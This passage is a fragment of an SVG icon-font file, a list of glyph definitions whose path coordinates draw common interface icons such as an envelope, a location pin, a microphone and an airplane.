165.964c-11.679-7.097-23.491-13.636-35.261-19.6-11.762 5.964-23.574 12.503-35.253 19.6-12.295 7.472-24.049 15.311-35.22 23.366-0.725 11.179-1.192 22.692-1.192 34.67 0 11.995 0.467 23.516 1.199 34.711 10.93 7.897 22.658 15.711 35.186 23.324 11.687 7.097 23.499 13.636 35.278 19.609 11.778-5.973 23.591-12.512 35.278-19.609 9.638-5.857 18.668-11.854 27.364-17.893 0.975-12.837 1.517-26.214 1.517-40.142 0-13.92-0.542-27.306-1.517-40.134-8.695-6.040-17.734-12.046-27.379-17.902zM316.563 161.733c-1.674-13.77-3.923-26.64-6.555-38.652-11.288 3.982-22.916 8.689-34.703 14.036 8.306 4.482 16.627 9.229 24.915 14.27 5.58 3.389 11.020 6.855 16.343 10.346zM236.886 137.125c-14.228-6.464-28.222-11.954-41.659-16.402-3.232 14.228-5.856 29.764-7.705 46.516 7.939-5.415 16.044-10.738 24.457-15.852 8.289-5.041 16.602-9.789 24.907-14.262zM167.772 202.891c-8.738 6.931-17.018 13.978-24.674 21.084 7.514 7.006 15.81 14.078 24.674 21.142-0.259-6.938-0.4-13.977-0.4-21.116-0.001-7.141 0.141-14.18 0.4-21.11zM187.539 280.87c1.841 16.702 4.465 32.203 7.688 46.407 13.436-4.448 27.423-9.938 41.65-16.394-8.305-4.482-16.635-9.229-24.923-14.269-8.439-5.132-16.568-10.397-24.415-15.744zM275.312 310.882c11.787 5.348 23.407 10.046 34.695 14.028 2.632-12.003 4.881-24.865 6.555-38.635-5.323 3.499-10.754 6.948-16.326 10.338-8.288 5.040-16.619 9.788-24.924 14.269zM336.63 251.139c11.862-9.046 22.774-18.143 32.421-27.139-9.647-8.989-20.559-18.085-32.421-27.131 0.433 8.871 0.683 17.918 0.683 27.131 0.001 9.212-0.249 18.259-0.683 27.139zM252.338 420.19c19.435 0 40.168-29.639 53.546-78.553-16.094-5.598-32.829-12.629-49.789-20.9-19.393 9.455-38.469 17.268-56.645 23.199 13.396 47.532 33.763 76.254 52.888 76.254zM88.436 325.885c7.222 11.887 25.323 14.386 39.243 14.386 14.777 0 32.204-2.832 51.114-8.022-4.524-19.642-7.848-41.334-9.705-64.533-13.987-10.447-26.79-21.125-38.219-31.838-7.305 7.481-14.003 14.961-19.85 22.391-22.85 28.998-31.080 53.638-22.583 67.616zM127.67 107.72c-13.912 0-32.012 2.499-39.235 14.378-10.404 17.127 5.248 51.755 42.458 89.957 11.562-10.771 24.399-21.375 38.185-31.671 1.849-23.241 5.181-44.966 9.713-64.641-18.908-5.183-36.335-8.023-51.121-8.023zM252.338 27.81c-19.125 0-39.492 28.721-52.888 76.245 18.177 5.939 37.261 13.745 56.645 23.208 16.96-8.272 33.695-15.302 49.789-20.908-13.378-48.915-34.111-78.545-53.546-78.545zM423.746 122.098c-7.222-11.879-25.315-14.378-39.227-14.378-16.61 0-36.527 3.566-58.177 10.047 3.915 17.426 6.873 36.435 8.73 56.644 17.127 12.287 32.612 24.965 46.19 37.668 37.228-38.21 52.888-72.854 42.484-89.981z" />
<glyph unicode="&#xe61a;" d="M93.926 428.72v-409.44l162.070 119.42 162.078-119.42v409.44h-324.148zM401.014 53.042l-145.018 106.85-145.010-106.85v358.618h290.028v-358.618zM170.696 326.36h170.604v-17.060h-170.604v17.060zM170.696 258.12h170.604v-17.060h-170.604v17.060z" />
<glyph unicode="&#xe61b;" d="M434.888 112.818h-359.959l71.872 71.897-12.062 12.062-91.881-91.905 91.881-91.89 12.062 12.063-70.706 70.713h375.853v153.54h-17.060zM76.695 334.598h359.81l-71.289-71.305 12.061-12.062 91.865 91.88-91.881 91.907-12.062-12.063 71.272-71.297h-376.836v-153.54h17.060z" />
<glyph unicode="&#xe61c;" d="M443.66 181.371c0-103.477-84.183-187.66-187.66-187.66-103.476 0-187.66 84.183-187.66 187.66 0 103.234 83.8 187.251 186.952 187.643v-85.325l162.070 93.839-162.070 93.821v-85.275c-112.756-0.383-204.012-91.855-204.012-204.703 0-113.047 91.639-204.72 204.72-204.72 113.064 0 204.72 91.673 204.72 204.72h-17.060zM272.352 441.761l110.957-64.233-110.957-64.25v128.483z" />
<glyph unicode="&#xe61d;" d="M418.316 249.682c0.033 1.366 0.2 2.682 0.2 4.048 0 73.021-59.194 132.215-132.215 132.215-52.613 0-97.912-30.804-119.196-75.287-9.205 4.632-19.567 7.297-30.572 7.297-33.769 0-61.742-24.574-67.207-56.794-40.216-13.795-69.18-51.847-69.18-96.763 0-56.494 45.79-102.293 102.268-102.343l316.102 0.016c51.596 0.267 93.338 42.15 93.338 93.797 0 51.73-41.841 93.664-93.538 93.814zM418.424 79.131l-3.723-0.016h-312.27c-46.99 0.049-85.225 38.301-85.225 85.283 0 36.403 23.174 68.806 57.653 80.636l9.596 3.281 1.691 9.996c4.182 24.674 25.373 42.583 50.388 42.583 7.972 0 15.677-1.849 22.9-5.481l15.553-7.813 7.505 15.693c19.068 39.851 59.818 65.591 103.81 65.591 63.5 0 115.155-51.647 115.155-115.155 0-0.35-0.042-0.717-0.067-1.066-0.049-0.85-0.107-1.699-0.125-2.566l-0.433-17.41 17.435-0.067c42.2-0.117 76.528-34.553 76.528-76.754-0.001-42.082-34.263-76.518-76.371-76.735zM255.996 138.825c-32.92 0-59.71 26.773-59.71 59.71 0 32.921 26.79 59.71 59.71 59.71v-31.505l64.2 37.069-64.2 37.086v-25.59c-42.4 0-76.77-34.37-76.77-76.77s34.37-76.77 76.77-76.77c42.392 0 76.77 34.37 76.77 76.77h-17.060c0-32.937-26.79-59.71-59.71-59.71z" />
<glyph unicode="&#xe61e;" d="M449.825 334.434c-0.175 0.058-0.308 0.191-0.491 0.233l-361.976 85.3c-4.589 1.058-9.188-1.766-10.262-6.347-1.075-4.59 1.766-9.18 6.348-10.263l290.536-68.464h-307.314c-13.204 0-23.916-10.704-23.916-23.916v-259.257c0-13.203 10.713-23.907 23.916-23.907h378.668c13.212 0 23.916 10.704 23.916 23.907v259.256c0 11.67-8.363 21.358-19.425 23.458zM452.19 51.719c0-3.774-3.073-6.847-6.856-6.847h-378.668c-3.782 0-6.856 3.073-6.856 6.847v259.257c0 3.781 3.074 6.856 6.856 6.856h378.668c3.782 0 6.856-3.074 6.856-6.856v-259.257zM196.223 198.419c-7.064 0-12.811-5.73-12.811-12.795 0-7.047 5.748-12.795 12.811-12.795 7.047 0 12.779 5.748 12.779 12.795 0 7.065-5.731 12.795-12.779 12.795zM102.46 185.624c0 7.065-5.748 12.795-12.803 12.795-7.048 0-12.787-5.73-12.787-12.795 0-7.047 5.74-12.795 12.787-12.795 7.055 0 12.803 5.749 12.803 12.795zM302.924 198.419c-7.047 0-12.804-5.73-12.804-12.795 0-7.047 5.757-12.795 12.804-12.795 7.072 0 12.786 5.748 12.786 12.795 0 7.065-5.714 12.795-12.786 12.795zM149.367 173.538c-7.048 0-12.787-5.731-12.787-12.787s5.74-12.803 12.787-12.803c7.055 0 12.803 5.747 12.803 12.803s-5.748 12.787-12.803 12.787zM256 160.034c0 7.056-5.73 12.787-12.795 12.787-7.047 0-12.795-5.731-12.795-12.787s5.748-12.803 12.795-12.803c7.065 0.001 12.795 5.748 12.795 12.803zM149.367 224.002c-7.048 0-12.787-5.74-12.787-12.787 0-7.072 5.74-12.803 12.787-12.803 7.055 0 12.803 5.73 12.803 12.803 0 7.047-5.748 12.787-12.803 12.787zM243.205 198.412c7.065 0 12.795 5.73 12.795 12.803 0 7.047-5.73 12.787-12.795 12.787-7.047 0-12.795-5.74-12.795-12.787 0-7.073 5.748-12.803 12.795-12.803zM106.725 146.998c-7.055 0-12.795-5.73-12.795-12.795s5.74-12.795 12.795-12.795c7.047 0 12.795 5.731 12.795 12.795s-5.748 12.795-12.795 12.795zM285.864 146.998c-7.072 0-12.804-5.73-12.804-12.795s5.731-12.795 12.804-12.795c7.056 0 12.786 5.731 12.786 12.795s-5.73 12.795-12.786 12.795zM106.725 249.592c-7.055 0-12.795-5.748-12.795-12.804s5.74-12.786 12.795-12.786c7.047 0 12.795 5.73 12.795 12.786 0 7.055-5.748 12.804-12.795 12.804zM285.864 224.002c7.056 0 12.786 5.73 12.786 12.786 0 7.055-5.73 12.804-12.786 12.804-7.072 0-12.804-5.748-12.804-12.804s5.731-12.786 12.804-12.786zM140.196 113.112c-7.039 0-12.795-5.731-12.795-12.787s5.756-12.803 12.795-12.803c7.081 0 12.795 5.748 12.795 12.803s-5.714 12.787-12.795 12.787zM251.402 113.112c-7.056 0-12.795-5.731-12.795-12.787s5.739-12.803 12.795-12.803c7.064 0 12.795 5.748 12.795 12.803s-5.731 12.787-12.795 12.787zM140.845 258.122c7.081 0 12.795 5.73 12.795 12.786 0 7.072-5.714 12.804-12.795 12.804-7.038 0-12.795-5.731-12.795-12.804 0-7.056 5.757-12.786 12.795-12.786zM251.402 283.712c-7.056 0-12.795-5.731-12.795-12.804 0-7.056 5.739-12.786 12.795-12.786 7.064 0 12.795 5.73 12.795 12.786 0 7.072-5.731 12.804-12.795 12.804zM196.216 146.998c-7.056 0-12.804-5.73-12.804-12.795 0-7.047 5.748-12.795 12.804-12.795 7.055 0 12.786 5.748 12.786 12.795 0 7.064-5.731 12.795-12.786 12.795zM196.216 96.068c-7.056 0-12.804-5.748-12.804-12.804s5.748-12.803 12.804-12.803c7.055 0 12.786 5.748 12.786 12.803s-5.731 12.804-12.786 12.804zM196.216 249.592c-7.056 0-12.804-5.748-12.804-12.804s5.748-12.786 12.804-12.786c7.055 0 12.786 5.73 12.786 12.786 0 7.055-5.731 12.804-12.786 12.804zM196.216 300.772c-7.056 0-12.804-5.731-12.804-12.787s5.748-12.803 12.804-12.803c7.055 0 12.786 5.748 12.786 12.803s-5.731 12.787-12.786 12.787zM392.497 283.712c-14.128 0-25.607-11.454-25.607-25.582s11.479-25.581 25.607-25.581c14.111 0 25.573 11.454 25.573 25.581 0 14.128-11.462 25.582-25.573 25.582zM392.497 249.608c-4.715 0-8.547 3.824-8.547 8.521s3.833 8.522 8.547 8.522c4.698 0 8.513-3.824 8.513-8.522s-3.815-8.521-8.513-8.521zM392.497 215.472c-14.128 0-25.607-11.454-25.607-25.582s11.479-25.581 25.607-25.581c14.111 0 25.573 11.454 25.573 25.581s-11.462 25.582-25.573 25.582zM392.497 181.368c-4.715 0-8.547 3.824-8.547 8.521s3.833 8.522 8.547 8.522c4.698 0 8.513-3.824 8.513-8.522s-3.815-8.521-8.513-8.521z" />
<glyph unicode="&#xe61f;" d="M119.52 283.71c-9.43 0-17.060-7.639-17.060-17.060s7.63-17.060 17.060-17.060c9.413 0 17.060 7.639 17.060 17.060s-7.647 17.060-17.060 17.060zM170.7 283.71c-9.43 0-17.060-7.639-17.060-17.060s7.63-17.060 17.060-17.060c9.413 0 17.060 7.639 17.060 17.060s-7.647 17.060-17.060 17.060zM469.25 351.95h-93.83v85.3h-238.84v-85.3h-93.83c-4.715 0-8.53-3.815-8.53-8.53v-255.9c0-4.715 3.815-8.53 8.53-8.53h93.83v-68.24h238.84v68.24h93.83c4.714 0 8.53 3.815 8.53 8.53v255.9c0 4.715-3.816 8.53-8.53 8.53zM153.64 420.19h204.72v-68.24h-204.72v68.24zM358.36 27.81h-204.72v153.54h204.72v-153.54zM460.72 96.050h-85.3v102.36h-238.84v-102.36h-85.3v238.84h409.44v-238.84z" />
<glyph unicode="&#xe620;" d="M256 224.009l238.84-136.489v272.96l-238.84-136.471zM477.78 116.917l-187.394 107.092 187.394 107.074v-214.166zM17.16 224.009l238.84-136.489v272.96l-238.84-136.471zM238.94 116.917l-187.394 107.092 187.394 107.074v-214.166z" />
<glyph unicode="&#xe621;" d="M244.888 437.25h17.060v-204.72h-17.060v204.72zM338.718 402.731v-18.868c62.101-30.63 104.942-94.596 104.942-168.392 0-103.476-84.183-187.66-187.66-187.66-103.476 0-187.66 84.184-187.66 187.66 0 71.739 40.477 134.173 99.778 165.744v19.183c-69.081-32.888-116.838-103.318-116.838-184.928 0-113.064 91.657-204.72 204.72-204.72s204.72 91.656 204.72 204.72c0 83.618-50.155 155.481-122.002 187.261z" />
<glyph unicode="&#xe622;" d="M315.71 364.745v42.65h-119.42v-42.65h-145.010v-324.14h409.44v324.14h-145.010zM213.35 390.335h85.3v-25.59h-85.3v25.59zM196.29 347.685h247.37v-136.48h-127.95v34.12h-119.42v-34.12h-127.95v136.48h127.95zM298.65 228.265v-51.18h-85.3v51.18h85.3zM68.34 57.665v136.48h127.95v-34.12h119.42v34.12h127.95v-136.48h-375.32z" />
<glyph unicode="&#xe623;" d="M256 437.248c-117.787 0-213.25-95.463-213.25-213.25s95.463-213.246 213.25-213.246c117.788 0 213.25 95.458 213.25 213.246s-95.462 213.25-213.25 213.25zM256 27.812c-108.174 0-196.19 88.012-196.19 196.186s88.016 196.19 196.19 196.19c108.174 0 196.19-88.015 196.19-196.19 0-108.174-88.016-196.186-196.19-196.186zM264.53 351.948h-17.060v-119.42h-118.854v-17.060h118.854v-118.854h17.060v118.854h119.42v17.060h-119.42z" />
<glyph unicode="&#xe624;" d="M119.52 373.425l256.158-149.425-256.158-149.424v298.849zM102.46 403.13v-358.26l307.080 179.13-307.080 179.13z" />
<glyph unicode="&#xe625;" d="M145.974-7.426l-21.276 100.294-101.084 22.349 20.65 39.593 92.555 5.057c4.749 6.181 15.361 19.742 21.992 26.365l84.334 84.342-175.823 86.208 44.516 44.507 222.913-39.102 78.928 78.928c9.355 9.363 23.932 14.311 42.15 14.311 12.42 0 22.316-2.283 22.732-2.382l4.798-1.124 1.424-4.715c7.497-24.807 2.99-52.771-10.713-66.482l-79.302-79.303 38.951-222.004-44.508-44.516-85.866 175.115-78.769-78.786c-8.28-8.28-25.964-24.574-32.529-30.589l-6.889-86.807-39.184-21.259zM49.037 127.063l90.073-19.901 18.81-88.699 10.962 5.948 6.689 84.284 2.482 2.266c0.25 0.225 24.674 22.541 34.453 32.321l95.655 95.671 85.866-175.115 21.35 21.358-38.951 222.021 85.583 85.567c7.43 7.43 11.928 25.564 7.738 44.524-3.449 0.516-8.413 1.058-13.919 1.058-9.48 0-22.391-1.616-30.089-9.313l-85.192-85.208-222.928 39.101-21.358-21.35 175.823-86.208-101.211-101.22c-7.721-7.713-22.691-27.547-22.841-27.739l-2.391-3.165-90.748-4.964-5.856-11.237z" />
<glyph unicode="&#xe626;" d="M426.598 343.42v68.24h-400.906v-307.080h59.71v-68.24h400.906v307.080h-59.71zM42.752 121.64v272.96h366.786v-51.18h-324.136v-221.78h-42.65zM469.248 53.4h-366.786v272.96h366.786v-272.96z" />
<glyph unicode="&#xe627;" d="M369.381 454.31h-226.761c-12.754 0-23.1-10.355-23.1-23.108v-414.413c0-12.77 10.346-23.099 23.1-23.099h226.761c12.754 0 23.099 10.329 23.099 23.099v414.413c0 12.753-10.345 23.108-23.099 23.108zM375.42 16.789c0-3.332-2.707-6.039-6.039-6.039h-226.761c-3.333 0-6.040 2.707-6.040 6.039v79.202h238.84v-79.202zM375.42 113.051h-238.84v272.669h238.84v-272.669zM375.42 402.78h-238.84v28.422c0 3.332 2.707 6.048 6.040 6.048h226.761c3.333 0 6.039-2.716 6.039-6.048v-28.422zM230.41 61.93h51.18v-17.060h-51.18v17.060z" />
<glyph unicode="&#xe628;" d="M492.341 387.17l-68.023 68.015-16.644-16.651-23.291 23.274c-3.332 3.332-8.73 3.332-12.061 0l-138.214-138.222c-3.332-3.333-3.332-8.73 0-12.062 1.667-1.666 3.849-2.499 6.032-2.499 2.182 0 4.365 0.833 6.031 2.499l132.182 132.19 17.26-17.243-293.103-293.094 19.759-19.767c-8.313 4.115-17.376 6.214-26.44 6.214-15.31 0-30.621-5.84-42.3-17.527-1.199-1.183-2.349-2.466-3.449-3.807-0.549-0.641-1.066-1.308-1.566-1.974-0.6-0.75-1.166-1.541-1.715-2.333-0.417-0.583-0.833-1.15-1.216-1.732-24.807-37.294-25.923-108.624-25.923-108.624s2.599-0.133 7.097-0.133c20.492 0 80.152 2.807 111.373 34.020 18.593 18.601 22.341 46.398 11.295 68.748l21.108-21.1 321.808 321.808zM126.067 29.776c-19.042-19.034-52.446-25.606-76.27-27.856l38.836 38.835-12.063 12.062-37.202-37.202c3.032 22.757 9.063 50.33 20.476 67.465l0.483 0.682 0.416 0.592c0.367 0.533 0.75 1.082 1.416 1.924 0.283 0.374 0.566 0.749 1.066 1.349 0.75 0.899 1.517 1.766 2.366 2.607 8.080 8.080 18.81 12.529 30.238 12.529 11.412 0 22.158-4.448 30.238-12.529 16.661-16.667 16.661-43.79 0-60.458zM468.218 387.17l-101.178-101.178-43.9 43.891 101.178 101.178 43.9-43.891zM311.079 317.822l43.9-43.891-184.446-184.445-43.899 43.891 184.445 184.445z" />
<glyph unicode="&#xe629;" d="M198.064 164.206l76.262-153.456 194.899 426.5-426.45-204.67 155.289-68.374zM202.596 180.834l-119.045 52.413 326.938 156.905-207.893-209.318zM273.693 50.151l-59.002 118.738 209.743 211.166-150.741-329.904z" />
<glyph unicode="&#xe62a;" d="M447.925 394.6v26.456c0 23.075-18.71 41.784-41.784 41.784h-274.676c-23.074 0-41.767-18.71-41.767-41.784v-26.456h-7.831c-19.259 0-34.853-15.611-34.853-34.862v-58.385c0-19.251 15.594-34.861 34.853-34.861l160.588 0.050c9.813 0 17.81-7.989 17.81-17.802v-58.86h-34.104v-204.72h85.3v204.72h-34.136v58.86c0 19.251-15.611 34.862-34.87 34.862h-21.125v-0.050h-139.462c-9.813 0-17.793 7.988-17.793 17.801v58.385c0 9.813 7.98 17.802 17.793 17.802h7.831v-26.465c0-23.075 18.693-41.775 41.767-41.775h274.675c23.075 0 41.784 18.7 41.784 41.775v26.465h17.060v17.060h-17.060zM294.401 2.22h-51.18v170.6h51.18v-170.6zM430.865 351.075c0-13.628-11.096-24.715-24.724-24.715h-274.676c-13.628 0-24.707 11.087-24.707 24.715v69.981c0 13.636 11.079 24.724 24.707 24.724h274.675c13.628 0 24.724-11.088 24.724-24.724v-69.981z" />
<glyph unicode="&#xe62b;" d="M256 428.72h-136.48c-40.818 0-68.24-27.422-68.24-68.24v-283.731c0-13.477 5.022-57.469 69.705-57.469h339.735v409.44h-204.72zM238.94 411.66v-163.194l-41.784 38.051-46.39-39.034v164.177h88.174zM119.52 411.66h14.186v-200.829l63 53.012 59.294-53.987v201.804h187.66v-281.49h-324.14c-21.709 0-39.318-6.48-51.18-17.81v248.12c0 31.088 20.092 51.18 51.18 51.18zM120.985 36.34c-39.109 0-50.413 17.743-52.304 34.721 0.033 26.331 19.026 42.049 50.839 42.049h324.14v-76.77h-322.675z" />
<glyph unicode="&#xe62c;" d="M444.473 412.837c-4.998 4.99-11.554 7.488-18.102 7.488-6.555 0-13.103-2.498-18.093-7.488l-75.295-75.287v14.261h-272.96v-324.136h324.14v272.956h-15.693l76.003 76.013c10.005 9.978 10.005 26.196 0 36.193zM367.103 44.735h-290.020v290.016h253.11l-133.69-133.681v-36.919h35.503l135.097 135.114v-254.53zM432.411 388.704l-207.469-207.493h-11.379v12.795l206.786 206.777c2.166 2.166 4.698 2.482 6.022 2.482s3.866-0.324 6.039-2.498c2.183-2.174 2.508-4.715 2.508-6.039 0.001-1.317-0.324-3.841-2.507-6.024z" />
<glyph unicode="&#xe62d;" d="M17.16 360.48v-272.96l238.84 136.489-238.84 136.471zM34.22 331.083l187.394-107.075-187.394-107.091v214.166zM256 360.48v-272.96l238.84 136.489-238.84 136.471zM273.060 331.083l187.394-107.075-187.394-107.091v214.166z" />
<glyph unicode="&#xe62e;" d="M145.11 437.25v-238.84h-102.36c0 0 0-105.425 0-139.495 0-34.078 31.721-48.165 55.228-48.165 23.499 0 260.165 0 320.092 0 25.857 0 51.18 25.149 51.18 51.18 0 18.793 0 375.32 0 375.32h-324.14zM97.978 27.81c-10.621 0-38.168 5.59-38.168 31.105v122.435h85.3v-115.080c0-11.42-14.927-38.46-38.459-38.46h-8.673zM452.19 61.93c0-16.576-17.534-34.12-34.12-34.12h-273.801c11.487 11.971 17.901 27.689 17.901 38.46v353.92h290.020v-358.26zM196.29 386.070h221.78v-17.060h-221.78v17.060zM196.29 155.76h221.78v-17.060h-221.78v17.060zM196.29 96.050h221.78v-17.060h-221.78v17.060zM418.070 326.36h-221.78v-127.95h221.78v127.95zM401.010 215.47h-187.66v93.83h187.66v-93.83z" />
<glyph unicode="&#xe62f;" d="M42.75 343.408h221.78v-17.060h-221.78v17.060zM42.75 266.638h221.78v-17.060h-221.78v17.060zM42.75 189.868h221.78v-17.060h-221.78v17.060zM349.83 333.212l119.42-15.394c0 85.3-68.24 102.36-136.48 119.445v-324.165c-10.212 0-26.456 0-52.563 0-50.138 0-66.857-26.531-66.857-50.764 0-20.558 15.386-51.596 68.24-51.596 75.571 0 68.24 60.676 68.24 102.36v220.114zM450.657 337.419l-100.827 12.994v64.809c56.695-15.353 93.106-32.213 100.827-77.803zM320.275 39.535c-7.68-7.789-20.701-11.737-38.685-11.737-48.714 0-51.18 28.773-51.18 34.536 0 21.417 18.152 33.704 49.797 33.704h52.563v-13.103h0.042c-0.509-17.186-2.949-33.687-12.537-43.4z" />
<glyph unicode="&#xe630;" d="M460.72 456.721l-281.49-99.578v-246.679c-13.303 15.786-33.195 25.84-55.445 25.84-40.035 0-72.505-32.47-72.505-72.521 0-40.035 32.47-72.505 72.505-72.505 39.618 0 71.771 31.804 72.438 71.264h0.067v282.54l247.37 87.516v-228.311c-13.303 15.786-33.195 25.831-55.454 25.831-40.042 0-72.496-32.454-72.496-72.505 0-40.042 32.454-72.505 72.496-72.505s72.514 32.463 72.514 72.505c0 1.374-0.133 2.715-0.208 4.065h0.208v295.043zM123.785 8.339c-30.572 0-55.445 24.873-55.445 55.445 0 30.579 24.873 55.461 55.445 55.461s55.445-24.882 55.445-55.461c0-30.572-24.873-55.445-55.445-55.445zM388.206 102.169c-30.572 0-55.436 24.873-55.436 55.445s24.865 55.445 55.436 55.445c30.58 0 55.454-24.873 55.454-55.445s-24.873-55.445-55.454-55.445z" />
<glyph unicode="&#xe631;" d="M264.53 343.004v26.356c0 7.789 16.46 18.093 29.688 26.382 18.951 11.862 38.552 24.141 38.552 42.026v42.132h-17.060v-42.133c0-8.439-16.935-19.042-30.547-27.572-18.534-11.596-37.693-23.599-37.693-40.835v-26.356c-66.666-4.282-119.42-58.011-119.42-123.827v-126.833c0-68.615 57.286-124.244 127.95-124.244s127.95 55.628 127.95 124.244v126.833c0 65.816-52.755 119.545-119.42 123.827zM366.89 219.177v-12.237h-102.36v119.004c57.16-4.241 102.36-50.448 102.36-106.767zM145.11 219.177c0 56.319 45.199 102.526 102.36 106.767v-119.004h-102.36v12.237zM256-14.84c-61.143 0-110.89 48.081-110.89 107.184v97.536h221.78v-97.536c0-59.103-49.748-107.184-110.89-107.184z" />
<glyph unicode="&#xe632;" d="M51.28 275.18c-28.272 0-51.18-22.916-51.18-51.18s22.908-51.18 51.18-51.18c28.255 0 51.18 22.916 51.18 51.18s-22.925 51.18-51.18 51.18zM51.28 189.88c-18.826 0-34.12 15.302-34.12 34.12s15.294 34.12 34.12 34.12c18.809 0 34.12-15.303 34.12-34.12s-15.311-34.12-34.12-34.12zM460.72 275.18c-28.272 0-51.18-22.916-51.18-51.18s22.908-51.18 51.18-51.18c28.255 0 51.18 22.916 51.18 51.18s-22.925 51.18-51.18 51.18zM460.72 189.88c-18.809 0-34.12 15.302-34.12 34.12s15.311 34.12 34.12 34.12c18.809 0 34.12-15.303 34.12-34.12s-15.311-34.12-34.12-34.12zM256 275.18c-28.272 0-51.18-22.916-51.18-51.18s22.908-51.18 51.18-51.18c28.255 0 51.18 22.916 51.18 51.18s-22.925 51.18-51.18 51.18zM256 189.88c-18.809 0-34.12 15.302-34.12 34.12s15.311 34.12 34.12 34.12c18.809 0 34.12-15.303 34.12-34.12s-15.311-34.12-34.12-34.12z" />
<glyph unicode="&#xe633;" d="M158.105 399.169c-13.545-27.473-20.717-57.819-20.717-89.023 0-111.631 90.822-202.446 202.454-202.446 32.838 0 64.567 7.83 92.989 22.591-34.395-61.901-99.969-101.918-173.799-101.918-109.848 0-199.222 89.365-199.222 199.214 0 71.854 38.552 136.521 98.295 171.582zM204.645 436.687c-93.072-24.139-161.895-108.474-161.895-209.101 0-119.437 96.846-216.274 216.282-216.274 102.194 0 187.611 70.964 210.218 166.218-33.395-32.62-79.019-52.771-129.408-52.771-102.385 0-185.394 83-185.394 185.386 0.001 48.982 19.143 93.406 50.197 126.542v0z" />
<glyph unicode="&#xe634;" d="M477.78 113.11v307.080h-443.56v-307.080h213.25v-68.24h-59.71v-17.060h136.48v17.060h-59.71v68.24h213.25zM51.28 403.13h409.44v-272.96h-409.44v272.96z" />
<glyph unicode="&#xe635;" d="M256.042 121.971c51.691 0 93.61 41.91 93.61 93.61v170.217c0 51.7-41.919 93.602-93.61 93.602s-93.61-41.902-93.61-93.602v-170.216c0-51.7 41.918-93.611 93.61-93.611zM179.452 385.798c0 42.227 34.356 76.582 76.59 76.582s76.59-34.356 76.59-76.582v-170.216c0-42.234-34.356-76.59-76.59-76.59s-76.59 34.356-76.59 76.59v170.216zM383.65 300.69v-85.109c0-70.382-57.26-127.65-127.65-127.65s-127.65 57.268-127.65 127.65v85.109h-17.020v-85.109c0-77.28 60.958-140.415 137.291-144.296h-1.089v-85.665h-76.632v-17.020h170.2v17.020h-76.548v85.665h-1.172c76.333 3.881 137.29 67.016 137.29 144.296v85.109h-17.020z" />
<glyph unicode="&#xe636;" d="M51.28 369.010v-68.24h409.44v68.24h-409.44zM443.66 317.83h-375.32v34.12h375.32v-34.12zM51.28 189.88h409.44v68.24h-409.44v-68.24zM68.34 241.060h375.32v-34.12h-375.32v34.12zM51.28 78.99h409.44v68.24h-409.44v-68.24zM68.34 130.17h375.32v-34.12h-375.32v34.12z" />
<glyph unicode="&#xe637;" d="M368.872 425.596l-10.512 5.256-8.53-4.256v-0.009l-93.83-46.914-102.36 51.18-110.89-55.445v-358.26l110.89 55.445 102.36-51.18 102.36 51.18 110.89-55.445v358.26l-100.378 50.188zM145.11 87.404l-85.3-42.65v320.108l85.3 42.65v-320.108zM247.47 44.754l-85.3 42.65v320.108l85.3-42.65v-320.108zM349.83 87.404l-85.3-42.65v320.108l85.3 42.65v-320.108zM452.19 44.754l-85.3 42.65v320.108l85.3-42.65v-320.108z" />
<glyph unicode="&#xe638;" d="M256.009 462.848c84.659 0 153.531-68.881 153.531-153.548 0-26.923-7.13-53.463-20.633-76.779l-132.907-230.301-132.923 230.318c-13.487 23.3-20.617 49.839-20.617 76.762 0 84.667 68.881 153.548 153.549 153.548zM256.009 249.598c32.921 0 59.701 26.782 59.701 59.702 0 32.911-26.781 59.693-59.701 59.693-32.929 0-59.719-26.782-59.719-59.693 0-32.92 26.789-59.702 59.719-59.702zM256.009 479.908c-94.222 0-170.609-76.403-170.609-170.608 0-31.113 8.371-60.194 22.916-85.309l147.684-255.899 147.684 255.9c14.545 25.115 22.916 54.195 22.916 85.309 0 94.204-76.387 170.607-170.591 170.607v0zM256.009 266.658c-23.557 0-42.659 19.084-42.659 42.642 0 23.532 19.101 42.633 42.659 42.633 23.549 0 42.641-19.101 42.641-42.633 0-23.558-19.093-42.642-42.641-42.642v0z" />
<glyph unicode="&#xe639;" d="M451.898 360.482h-409.148v-272.963h426.5v272.963h-17.352zM434.838 343.422l-164.769-164.769c-7.513-7.513-20.626-7.513-28.139 0l-164.794 164.769h357.702zM59.81 336.625l110.773-110.757-110.773-110.773v221.53zM73.421 104.582l109.233 109.216 47.214-47.207c6.972-6.981 16.261-10.83 26.132-10.83s19.159 3.849 26.132 10.83l47.214 47.214 109.224-109.223h-365.149zM452.19 115.086l-110.773 110.782 110.773 110.782v-221.564z" />
<glyph unicode="&#xe63a;" d="M467.659 266.529l-185.528 185.528c-6.972 6.981-16.26 10.829-26.132 10.829-9.871 0-19.158-3.848-26.131-10.829l-187.118-187.094v-279.849h426.5v279.824l-1.591 1.591zM70.073 268.162l171.858 171.833c7.514 7.514 20.626 7.514 28.14 0l179.938-179.946-122.62-122.62-45.257 45.266c-6.972 6.98-16.26 10.829-26.132 10.829-9.871 0-19.158-3.849-26.131-10.829l-45.932-45.924-122.627 122.628 8.763 8.763zM171.867 124.718l-1.267-1.283-0.016 0.017-110.774-110.765v224.087l112.057-112.056zM73.421 2.174l9.171 9.171h0.026l159.312 159.288c7.514 7.514 20.626 7.514 28.14 0l168.501-168.459h-365.15zM452.19 230.885v-218.207l-112.739 112.69 112.739 112.739v-7.222z" />
<glyph unicode="&#xe63b;" d="M467.659 266.529l-185.527 185.527c-6.972 6.981-16.261 10.829-26.132 10.829s-19.159-3.848-26.132-10.829l-40.451-40.442h-61.359v-61.351l-85.308-85.3v-279.849h426.5v279.824l-1.591 1.591zM450.007 260.048l-66.057-66.057v132.115l66.057-66.058zM241.931 439.995c7.514 7.514 20.626 7.514 28.139 0l28.381-28.38h-84.908l28.388 28.38zM315.51 394.554l51.38-51.388v-166.235l-39.502-39.502-45.257 45.266c-6.972 6.98-16.261 10.829-26.132 10.829s-19.159-3.849-26.132-10.829l-45.931-45.924-38.818 38.818v218.965h170.392zM70.072 268.162l57.986 57.978v-133.49l-66.748 66.749 8.762 8.763zM59.81 223.072v13.702l112.056-112.056-1.266-1.283-0.017 0.017-110.773-110.765v210.385zM73.421 2.174l9.171 9.171h0.025l159.313 159.288c7.514 7.514 20.626 7.514 28.139 0l168.501-168.459h-365.149zM452.19 234.242v-221.564l-112.739 112.69 112.739 112.739v-3.865zM196.29 343.374h119.42v-17.060h-119.42v17.060zM196.29 241.014h119.42v-17.060h-119.42v17.060zM196.29 292.194h85.3v-17.060h-85.3v17.060z" />
